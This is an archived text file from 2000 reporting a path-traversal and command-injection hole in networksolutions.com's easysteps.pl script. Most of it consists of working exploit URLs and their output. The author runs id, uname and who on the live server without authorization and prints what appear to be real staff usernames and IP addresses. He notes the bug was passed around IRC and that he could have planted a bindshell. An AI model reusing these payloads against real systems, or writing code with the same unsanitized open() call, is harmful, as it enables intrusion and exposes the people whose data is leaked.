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netsolbug.txt
Posted May 9, 2000
Authored by vade79, realhalo | Site realhalo.org

Major security issue with networksolutions.com(easysteps.pl). This is being distributed amongst the irc.

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SHA-256 | 5bb0b27956ea17dfff4e3397488439c628f1b4637003f3b6a938c243e772152c

netsolbug.txt

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networksolutions.com: www security hole. (may/9/2000)

Major security issue with networksolutions.com(easysteps.pl). I was in
#r00tabega, and someone relayed this(it was told to me Mr^Chaos found the
orginal read bug):

http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd

And I so with that initial bug found, I downloaded the perl script with the bug
itself. I noticed that a bigger problem existed:

---

open(CURR_FILE,$finalpath) or die "EASYSTEPS: Can't open file $finalpath\n";
my @LINES = <CURR_FILE>;
close(CURR_FILE);

---

$finalpath is for the most part supplied by the user. Knowning that open() can
be used to execute programs, I used the initial bug for this, by going to
the root dir and then accessing the file I wanted to execute followed by the
pipe:

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id|
return: uid=60001(nobody) gid=60001(nobody)

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a|
return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise

opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who|
return: "
matthewh pts/1 Apr 17 11:32 (216.168.238.173)
rholgado pts/2 Apr 17 15:35 (216.168.235.124)
schauhan pts/3 May 4 16:05 (216.168.238.21)
pvirador pts/4 Apr 20 17:02 (216.168.238.21)
rholgado pts/5 Apr 18 13:39 (216.168.235.124)
rholgado pts/6 Apr 18 13:40 (216.168.235.124)
"

I decided NOT to be retarded. But, I could have wrote a bindshell to a tmp
directory and connected. While looking around the system I noticed some
public exploits that would have been able to get me root.

I just thought this was worth commenting on of a major corp, with
such a obvious bug. (I don't want to goto jail, I don't know about you.)

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